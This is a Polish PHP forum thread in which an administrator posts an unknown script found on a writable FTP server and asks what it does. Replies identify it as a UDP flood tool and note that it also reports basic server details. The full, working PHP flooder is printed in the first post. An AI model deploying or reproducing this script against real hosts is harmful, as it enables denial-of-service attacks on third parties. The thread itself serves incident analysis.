Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: Skrypt PHP nieznanego pochodzenia i przeznaczenia na serwerze FTP
Forum PHP.pl > Forum > PHP
moon84pltl
Nie jestem majstrem od PHP więc dlatego zwracam się do forumowiczów w trybie pilnym poprzedni admin był dość niekompetętny i na ftp'ie publicznym zostawił prawo do zapisu i ktoś wrzucił owy skrypcik

<?php
set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$Sendlen = 65535;
$packets = 0;
ignore_user_abort(True);

if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
if (StrLen($_GET['rat'])<>0){
echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
exit;
}
echo "Warning to: opening";
exit;
}

for($i=0;$i<$Sendlen;$i++){
$out .= "A";
}

$max_time = time()+$exec_time;
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}

echo "Send Host��$host:$port<br><br>";
echo "Send Flow��$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb<br><br>";
echo "Send Rate��" . round($packets/$exec_time, 2) . " packs/s��" . round($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s";
?>

nie wiem co owy skrypt robi(na PHP to się prawie w ogóle nie znam) ale myślę że to jakaś podła gadzina
proszę o pomoc bo leżał tam ze dwa miechy więc chcę wiedzieć jakie to coś może nieść zagrożenia zwłaszcza dla serwera no dla maszyn klienckich również
pamil
Kod PHP dodawaj w odpowiednich tagach.
Ten kod wykonuje UDP flood na podany host oraz port przez określoną ilość czasu.

Tak nawiasem kod generuje duuużą ilość E_NOTICE, a jego autor nie wie co to isset() oraz nie zna działania pętli while. smile.gif
Masz szczęście, że trafiłeś na jakiegoś scriptkiddie/lame haksiora, bo straty mogłyby być dużo większe.
moon84pltl
Cytat(pamil @ 26.08.2012, 21:40:21 ) *
Kod PHP dodawaj w odpowiednich tagach.
Ten kod wykonuje UDP flood na podany host oraz port przez określoną ilość czasu.

Tak nawiasem kod generuje duuużą ilość E_NOTICE, a jego autor nie wie co to isset() oraz nie zna działania pętli while. smile.gif
Masz szczęście, że trafiłeś na jakiegoś scriptkiddie/lame haksiora, bo straty mogłyby być dużo większe.



Dziękuję Ci niezmiernie bardzo a czy mógł za pomocą tego dobić się do Bazy SQL albo nie daj Bóg kont shellowych bo jeśli nie to chwała mu za jego niewiedzę , czyli z tego co rozumiem to atakował stacje klienckie zalewając im UDP ramkami questionmark.gif
pamil
Nie, to zwykły flooder + wyświetlanie rzeczy które i tak są ogólnodostępne.
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.